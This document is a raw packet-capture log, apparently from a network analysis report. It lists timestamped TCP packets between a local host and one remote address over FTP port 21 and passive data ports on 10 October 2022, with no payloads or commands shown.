                                                                                                                                    Oct 10, 2022 06:02:33.399069071 CEST6454849772185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.399182081 CEST6454849772185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.399321079 CEST4977264548192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.399696112 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.400087118 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.408451080 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.432907104 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.432979107 CEST2149771185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.433085918 CEST4977121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.548115015 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.570795059 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.570959091 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.597141981 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.597188950 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.597220898 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.597403049 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.597563028 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.620511055 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.620659113 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.620779037 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.651284933 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.651454926 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.651515961 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.674530983 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.674782991 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.674844980 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.698417902 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.698596954 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.698859930 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.721641064 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.721935987 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.723345041 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.746406078 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.746650934 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.746712923 CEST4977464549192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.769367933 CEST6454949774185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.769504070 CEST4977464549192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.769821882 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.793351889 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.793526888 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.793936014 CEST4977464549192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.816777945 CEST6454949774185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.816850901 CEST6454949774185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.816915035 CEST4977464549192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.817286015 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.817368984 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.817476034 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.839920044 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.840198994 CEST2149773185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.840327024 CEST4977321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.974785089 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:33.997790098 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:33.998003960 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.026175976 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.026393890 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.026593924 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.026640892 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.026679993 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.026736021 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.028101921 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.051199913 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.051374912 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.051449060 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.074527025 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.074723005 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.074987888 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.099158049 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.099407911 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.099618912 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.123334885 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.123559952 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.124330044 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.147615910 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.147942066 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.149322033 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.172715902 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.172890902 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.173084974 CEST4977664550192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.197509050 CEST6455049776185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.197729111 CEST4977664550192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.198304892 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.222953081 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.223177910 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.224042892 CEST4977664550192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.246893883 CEST6455049776185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.246958971 CEST6455049776185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.247117996 CEST4977664550192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.247370958 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.247487068 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.247701883 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.270553112 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.270607948 CEST2149775185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.271008015 CEST4977521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.405292034 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.428558111 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.428675890 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.455224037 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.455316067 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.455317974 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.455374956 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.455602884 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.455652952 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.455869913 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.479044914 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.479177952 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.488487959 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.511775970 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.511864901 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.512031078 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.534976959 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.535080910 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.535235882 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.558537006 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.558639050 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.559921026 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.583241940 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.583348989 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.604456902 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.628302097 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.628418922 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.628617048 CEST4977864551192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.652894020 CEST6455149778185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.653006077 CEST4977864551192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.653254986 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.677088022 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.677221060 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.679338932 CEST4977864551192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.702924967 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.703162909 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.703593016 CEST6455149778185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.704054117 CEST6455149778185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.704132080 CEST4977864551192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.706094980 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.729011059 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.729060888 CEST2149777185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.729124069 CEST4977721192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.851813078 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.874516964 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.874635935 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.900190115 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.900264978 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.900424957 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.900463104 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.900490999 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.900510073 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.901354074 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.923873901 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.924015045 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.929382086 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.951914072 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.952023029 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.952229023 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.974766016 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.974848986 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.975032091 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.997951031 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:34.998037100 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:34.998437881 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.021532059 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.021627903 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.022605896 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.045722961 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.045839071 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.050211906 CEST4978064553192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.076301098 CEST6455349780185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.076425076 CEST4978064553192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.076721907 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.101604939 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.101722002 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.102180958 CEST4978064553192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.127149105 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.127273083 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.129053116 CEST6455349780185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.129100084 CEST6455349780185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.129199982 CEST4978064553192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.130352974 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.152681112 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.152728081 CEST2149779185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.155309916 CEST4977921192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.281212091 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.303817987 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.303955078 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.329256058 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.329315901 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.329350948 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.329451084 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.329489946 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.329652071 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.352812052 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.353085041 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.353250027 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.375741959 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.375957966 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.376089096 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.398770094 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.399115086 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.399486065 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.422672033 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.423109055 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.423883915 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.447405100 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.447607040 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.448792934 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.472054958 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.472335100 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.477411985 CEST4978264554192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.500933886 CEST6455449782185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.501087904 CEST4978264554192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.501692057 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.525175095 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.525315046 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.527440071 CEST4978264554192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.550389051 CEST6455449782185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.550442934 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.550473928 CEST6455449782185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.550574064 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.550614119 CEST4978264554192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.550884962 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.573374033 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.573421001 CEST2149781185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.573579073 CEST4978121192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.738508940 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.761581898 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.761733055 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.788820982 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.788887978 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.789060116 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.789381027 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.789474964 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.794800043 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.817847013 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.820421934 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.820497036 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.843813896 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.844394922 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.844481945 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.867767096 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.868510008 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.868721962 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.892113924 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.892451048 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.893048048 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.916105986 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.920419931 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.928775072 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.953505039 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.954395056 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.954591990 CEST4978464555192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.979538918 CEST6455549784185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:35.979676962 CEST4978464555192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:35.979887962 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.004532099 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.008388042 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.008878946 CEST4978464555192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.033207893 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.033694983 CEST6455549784185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.033723116 CEST6455549784185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.033881903 CEST4978464555192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.034020901 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.034020901 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.056696892 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.056786060 CEST2149783185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.056893110 CEST4978321192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.169691086 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.194210052 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.194408894 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.221879959 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.222266912 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.222369909 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.222620010 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.227030993 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.227217913 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.252568007 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.256486893 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.262727022 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.287002087 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.287251949 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.287455082 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.311402082 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.311657906 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.311781883 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.335709095 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.340423107 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.341216087 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.365365028 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.366385937 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.367357969 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.392435074 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.392651081 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.392987013 CEST4978664556192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.415821075 CEST6455649786185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.418920040 CEST4978664556192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.419337988 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.444211006 CEST2149785185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.446425915 CEST4978521192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.447072029 CEST4978664556192.168.2.3185.106.92.60
                                                                                                                                    Oct 10, 2022 06:02:36.469619989 CEST6455649786185.106.92.60192.168.2.3
                                                                                                                                    Oct 10, 2022 06:02:36.469913960 CEST6455649786185.106.92.60192.168.2.3
